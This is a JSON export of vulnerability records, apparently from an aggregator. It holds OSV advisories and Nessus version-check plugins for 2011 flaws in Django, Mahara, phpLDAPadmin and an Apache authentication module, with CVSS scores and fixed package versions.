{"osv": [{"lastseen": "2022-08-10T07:06:26", "description": "\nPaul McMillan, Mozilla and the Django core team discovered several\nvulnerabilities in Django, a Python web framework:\n\n\n* [CVE-2011-4136](https://security-tracker.debian.org/tracker/CVE-2011-4136)\nWhen using memory-based sessions and caching, Django sessions are\n stored directly in the root namespace of the cache. When user data is\n stored in the same cache, a remote user may take over a session.\n* [CVE-2011-4137](https://security-tracker.debian.org/tracker/CVE-2011-4137), [CVE-2011-4138](https://security-tracker.debian.org/tracker/CVE-2011-4138)\nDjango's field type URLField by default checks supplied URLs by\n issuing a request to them, which doesn't time out. A Denial of Service\n is possible by supplying specially prepared URLs that keep the\n connection open indefinitely or fill the Django server's memory.\n* [CVE-2011-4139](https://security-tracker.debian.org/tracker/CVE-2011-4139)\nDjango used X-Forwarded-Host headers to construct full URLs. 
This\n header may not contain trusted input and could be used to poison the\n cache.\n* [CVE-2011-4140](https://security-tracker.debian.org/tracker/CVE-2011-4140)\nThe CSRF protection mechanism in Django does not properly handle\n web-server configurations supporting arbitrary HTTP Host headers,\n which allows remote attackers to trigger unauthenticated forged\n requests.\n\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.0.2-1+lenny3.\n\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.2.3-3+squeeze2.\n\n\nFor the testing (wheezy) and unstable distribution (sid), this problem\nhas been fixed in version 1.3.1-1.\n\n\nWe recommend that you upgrade your python-django packages.\n\n\n", "cvss3": {}, "published": "2011-10-29T00:00:00", "type": "osv", "title": "python-django - several issues", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4136", "CVE-2011-4137", "CVE-2011-4138", "CVE-2011-4139", "CVE-2011-4140"], "modified": "2022-08-10T07:06:23", "id": "OSV:DSA-2332-1", "href": "https://osv.dev/vulnerability/DSA-2332-1", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T07:09:14", "description": "\nSeveral vulnerabilities were discovered in Mahara, an electronic portfolio, \nweblog, and resume builder:\n\n\n* [CVE-2011-2771](https://security-tracker.debian.org/tracker/CVE-2011-2771)\nTeemu Vesala discovered that missing input sanitising of RSS\n feeds could lead to cross-site 
scripting.\n* [CVE-2011-2772](https://security-tracker.debian.org/tracker/CVE-2011-2772)\nRichard Mansfield discovered that insufficient upload restrictions\n allowed denial of service.\n* [CVE-2011-2773](https://security-tracker.debian.org/tracker/CVE-2011-2773)\nRichard Mansfield discovered that the management of institutions was prone to\n cross-site request forgery.\n* (no CVE ID available yet)\n\n Andrew Nichols discovered a privilege escalation vulnerability\n in MNet handling.\n\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.0.4-4+lenny11.\n\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.2.6-2+squeeze3.\n\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.4.1-1.\n\n\nWe recommend that you upgrade your mahara packages.\n\n\n", "cvss3": {}, "published": "2011-11-04T00:00:00", "type": "osv", "title": "mahara - several", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2771", "CVE-2011-2772", "CVE-2011-2773", "CVE-2011-4118"], "modified": "2022-08-10T07:08:47", "id": "OSV:DSA-2334-1", "href": "https://osv.dev/vulnerability/DSA-2334-1", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T07:09:14", "description": "\nTwo vulnerabilities have been discovered in phpLDAPadmin, a web based\ninterface for administering LDAP servers. 
The Common Vulnerabilities and\nExposures project identifies the following problems:\n\n\n* [CVE-2011-4074](https://security-tracker.debian.org/tracker/CVE-2011-4074)\nInput appended to the URL in cmd.php (when cmd is set to \\_debug) is\n not properly sanitised before being returned to the user. This can be\n exploited to execute arbitrary HTML and script code in a user's browser\n session in context of an affected site.\n* [CVE-2011-4075](https://security-tracker.debian.org/tracker/CVE-2011-4075)\nInput passed to the orderby parameter in cmd.php (when cmd is set to\n query\\_engine, query is set to none, and search is set to e.g.\n 1) is not properly sanitised in lib/functions.php before being used in a\n create\\_function() function call. This can be exploited to inject and\n execute arbitrary PHP code.\n\n\nFor the oldstable distribution (lenny), these problems have been fixed in\nversion 1.1.0.5-6+lenny2.\n\n\nFor the stable distribution (squeeze), these problems have been fixed in\nversion 1.2.0.5-2+squeeze1.\n\n\nFor the testing distribution (wheezy), these problems will be fixed soon.\n\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.2.0.5-2.1.\n\n\nWe recommend that you upgrade your phpldapadmin packages.\n\n\n", "cvss3": {}, "published": "2011-10-31T00:00:00", "type": "osv", "title": "phpldapadmin - several issues", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4074", "CVE-2011-4075"], "modified": "2022-08-10T07:08:47", "id": "OSV:DSA-2333-1", 
"href": "https://osv.dev/vulnerability/DSA-2333-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-12T01:09:40", "description": "Django before 1.2.7 and 1.3.x before 1.3.1 uses a request's HTTP Host header to construct a full URL in certain circumstances, which allows remote attackers to conduct cache poisoning attacks via a crafted request.", "cvss3": {}, "published": "2011-10-19T10:55:00", "type": "osv", "title": "PYSEC-2011-4", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4139"], "modified": "2021-07-05T00:01:18", "id": "OSV:PYSEC-2011-4", "href": "https://osv.dev/vulnerability/PYSEC-2011-4", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-05-12T01:09:40", "description": "The verify_exists functionality in the URLField implementation in Django before 1.2.7 and 1.3.x before 1.3.1 originally tests a URL's validity through a HEAD request, but then uses a GET request for the new target URL in the case of a redirect, which might allow remote attackers to trigger arbitrary GET requests with an unintended source IP address via a crafted Location header.", "cvss3": {}, "published": "2011-10-19T10:55:00", "type": "osv", "title": "PYSEC-2011-3", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": 
"NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4138"], "modified": "2021-07-05T00:01:17", "id": "OSV:PYSEC-2011-3", "href": "https://osv.dev/vulnerability/PYSEC-2011-3", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-05-12T01:09:40", "description": "The CSRF protection mechanism in Django through 1.2.7 and 1.3.x through 1.3.1 does not properly handle web-server configurations supporting arbitrary HTTP Host headers, which allows remote attackers to trigger unauthenticated forged requests via vectors involving a DNS CNAME record and a web page containing JavaScript code.", "cvss3": {}, "published": "2011-10-19T10:55:00", "type": "osv", "title": "PYSEC-2011-5", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4140"], "modified": "2021-07-05T00:01:18", "id": "OSV:PYSEC-2011-5", "href": "https://osv.dev/vulnerability/PYSEC-2011-5", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-15T08:59:36", "description": "The CSRF protection mechanism in Django through 1.2.7 and 1.3.x through 1.3.1 does not properly handle web-server configurations supporting arbitrary HTTP Host headers, which allows remote attackers to trigger unauthenticated forged requests via vectors involving a DNS CNAME record and a web page containing JavaScript 
code.", "cvss3": {}, "published": "2018-07-23T19:51:19", "type": "osv", "title": "Moderate severity vulnerability that affects django", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4140"], "modified": "2022-08-15T08:59:14", "id": "OSV:GHSA-H95J-H2RV-QRG4", "href": "https://osv.dev/vulnerability/GHSA-h95j-h2rv-qrg4", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-12T01:09:51", "description": "django.contrib.sessions in Django before 1.2.7 and 1.3.x before 1.3.1, when session data is stored in the cache, uses the root namespace for both session identifiers and application-data keys, which allows remote attackers to modify a session by triggering use of a key that is equal to that session's identifier.", "cvss3": {}, "published": "2011-10-19T10:55:00", "type": "osv", "title": "PYSEC-2011-1", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4136"], "modified": "2021-07-05T00:01:17", "id": "OSV:PYSEC-2011-1", "href": "https://osv.dev/vulnerability/PYSEC-2011-1", "cvss": {"score": 
5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2022-08-13T03:35:01", "description": "django.contrib.sessions in Django before 1.2.7 and 1.3.x before 1.3.1, when session data is stored in the cache, uses the root namespace for both session identifiers and application-data keys, which allows remote attackers to modify a session by triggering use of a key that is equal to that session's identifier.", "cvss3": {}, "published": "2018-07-23T19:52:39", "type": "osv", "title": "Moderate severity vulnerability that affects django", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4136"], "modified": "2022-08-13T03:34:41", "id": "OSV:GHSA-X88J-93VC-WPMP", "href": "https://osv.dev/vulnerability/GHSA-x88j-93vc-wpmp", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2022-08-10T07:08:48", "description": "\nIt was discovered that libapache2-mod-authnz-external, an apache\nauthentication module, is prone to an SQL injection via the $user\nparameter.\n\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 3.2.4-2+squeeze1.\n\n\nThe oldstable distribution (lenny) does not contain\nlibapache2-mod-authnz-external.\n\n\nFor the testing distribution (wheezy), this problem will be fixed soon.\n\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 3.2.4-2.1.\n\n\nWe recommend that you upgrade your libapache2-mod-authnz-external packages.\n\n\n", "cvss3": {}, "published": "2011-07-19T00:00:00", "type": "osv", "title": 
"libapache2-mod-authnz-external - SQL injection", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2688"], "modified": "2022-08-10T07:08:45", "id": "OSV:DSA-2279-1", "href": "https://osv.dev/vulnerability/DSA-2279-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-12T01:09:49", "description": "The verify_exists functionality in the URLField implementation in Django before 1.2.7 and 1.3.x before 1.3.1 relies on Python libraries that attempt access to an arbitrary URL with no timeout, which allows remote attackers to cause a denial of service (resource consumption) via a URL associated with (1) a slow response, (2) a completed TCP connection with no application data sent, or (3) a large amount of application data, a related issue to CVE-2011-1521.", "cvss3": {}, "published": "2011-10-19T10:55:00", "type": "osv", "title": "PYSEC-2011-2", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1521", "CVE-2011-4137"], "modified": "2021-07-05T00:01:17", "id": "OSV:PYSEC-2011-2", "href": 
"https://osv.dev/vulnerability/PYSEC-2011-2", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2022-08-15T09:00:24", "description": "The verify_exists functionality in the URLField implementation in Django before 1.2.7 and 1.3.x before 1.3.1 relies on Python libraries that attempt access to an arbitrary URL with no timeout, which allows remote attackers to cause a denial of service (resource consumption) via a URL associated with (1) a slow response, (2) a completed TCP connection with no application data sent, or (3) a large amount of application data, a related issue to CVE-2011-1521.", "cvss3": {}, "published": "2018-07-23T19:51:35", "type": "osv", "title": "Moderate severity vulnerability that affects django", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1521", "CVE-2011-4137"], "modified": "2022-08-15T09:00:16", "id": "OSV:GHSA-3JQW-CRQJ-W8QW", "href": "https://osv.dev/vulnerability/GHSA-3jqw-crqj-w8qw", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}}], "nessus": [{"lastseen": "2022-05-24T16:00:42", "description": "Paul McMillan, Mozilla and the Django core team discovered several vulnerabilities in Django, a Python web framework :\n\n - CVE-2011-4136 When using memory-based sessions and caching, Django sessions are stored directly in the root namespace of the cache. 
When user data is stored in the same cache, a remote user may take over a session.\n\n - CVE-2011-4137, CVE-2011-4138 Django's field type URLField by default checks supplied URLs by issuing a request to them, which doesn't time out. A Denial of Service is possible by supplying specially prepared URLs that keep the connection open indefinitely or fill the Django server's memory.\n\n - CVE-2011-4139 Django used X-Forwarded-Host headers to construct full URLs. This header may not contain trusted input and could be used to poison the cache.\n\n - CVE-2011-4140 The CSRF protection mechanism in Django does not properly handle web-server configurations supporting arbitrary HTTP Host headers, which allows remote attackers to trigger unauthenticated forged requests.", "cvss3": {"score": null, "vector": null}, "published": "2011-10-31T00:00:00", "type": "nessus", "title": "Debian DSA-2332-1 : python-django - several issues", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4136", "CVE-2011-4137", "CVE-2011-4138", "CVE-2011-4139", "CVE-2011-4140"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:python-django", "cpe:/o:debian:debian_linux:5.0", "cpe:/o:debian:debian_linux:6.0"], "id": "DEBIAN_DSA-2332.NASL", "href": "https://www.tenable.com/plugins/nessus/56671", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2332. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56671);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-4136\", \"CVE-2011-4137\", \"CVE-2011-4138\", \"CVE-2011-4139\", \"CVE-2011-4140\");\n script_bugtraq_id(49573);\n script_xref(name:\"DSA\", value:\"2332\");\n\n script_name(english:\"Debian DSA-2332-1 : python-django - several issues\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Paul McMillan, Mozilla and the Django core team discovered several\nvulnerabilities in Django, a Python web framework :\n\n - CVE-2011-4136\n When using memory-based sessions and caching, Django\n sessions are stored directly in the root namespace of\n the cache. When user data is stored in the same cache, a\n remote user may take over a session.\n\n - CVE-2011-4137, CVE-2011-4138\n Django's field type URLfield by default checks supplied\n URL's by issuing a request to it, which doesn't time\n out. A Denial of Service is possible by supplying\n specially prepared URL's that keep the connection open\n indefinately or fill the Django's server memory.\n\n - CVE-2011-4139\n Django used X-Forwarded-Host headers to construct full\n URL's. 
This header may not contain trusted input and\n could be used to poison the cache.\n\n - CVE-2011-4140\n The CSRF protection mechanism in Django does not\n properly handle web-server configurations supporting\n arbitrary HTTP Host headers, which allows remote\n attackers to trigger unauthenticated forged requests.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=641405\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-4136\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-4137\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-4138\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-4139\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-4140\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/python-django\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2011/dsa-2332\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the python-django packages.\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.0.2-1+lenny3.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.2.3-3+squeeze2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:python-django\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:5.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/10/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"5.0\", prefix:\"python-django\", reference:\"1.0.2-1+lenny3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"python-django\", reference:\"1.2.3-3+squeeze2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"python-django-doc\", reference:\"1.2.3-3+squeeze2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:49:48", "description": "python-django update version to 1.2.7 fixes several security issues including denial of service, CSRF and information leaks:\nhttps://www.djangoproject.com/weblog/2011/sep/10/127/", "cvss3": {"score": null, "vector": 
null}, "published": "2014-06-13T00:00:00", "type": "nessus", "title": "openSUSE Security Update : python-django (openSUSE-SU-2012:0653-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4136", "CVE-2011-4137", "CVE-2011-4138", "CVE-2011-4139", "CVE-2011-4140"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:python-django", "cpe:/o:novell:opensuse:11.4"], "id": "OPENSUSE-2012-294.NASL", "href": "https://www.tenable.com/plugins/nessus/74633", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2012-294.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(74633);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2011-4136\", \"CVE-2011-4137\", \"CVE-2011-4138\", \"CVE-2011-4139\", \"CVE-2011-4140\");\n\n script_name(english:\"openSUSE Security Update : python-django (openSUSE-SU-2012:0653-1)\");\n script_summary(english:\"Check for the openSUSE-2012-294 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"python-django update version to 1.2.7 fixes several security issues\nincluding denial of service, CSRF and information leaks:\nhttps://www.djangoproject.com/weblog/2011/sep/10/127/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=718045\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2012-05/msg00037.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://www.djangoproject.com/weblog/2011/sep/10/127/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected python-django package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-django\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.4)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.4\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.4\", reference:\"python-django-1.2.7-6.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python-django\");\n}\n", "cvss": {"score": 6.8, 
"vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:59:26", "description": "Paul McMillan discovered that Django used the root namespace when storing cached session data. A remote attacker could exploit this to modify sessions. (CVE-2011-4136)\n\nPaul McMillan discovered that Django would not time out on arbitrary URLs when the application used URLFields. This could be exploited by a remote attacker to cause a denial of service via resource exhaustion.\n(CVE-2011-4137)\n\nPaul McMillan discovered that while Django would check the validity of a URL via a HEAD request, it would instead use a GET request for the target of a redirect. This could potentially be used to trigger arbitrary GET requests via a crafted Location header. (CVE-2011-4138)\n\nIt was discovered that Django would sometimes use a request's HTTP Host header to construct a full URL. A remote attacker could exploit this to conduct host header cache poisoning attacks via a crafted request. (CVE-2011-4139).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. 
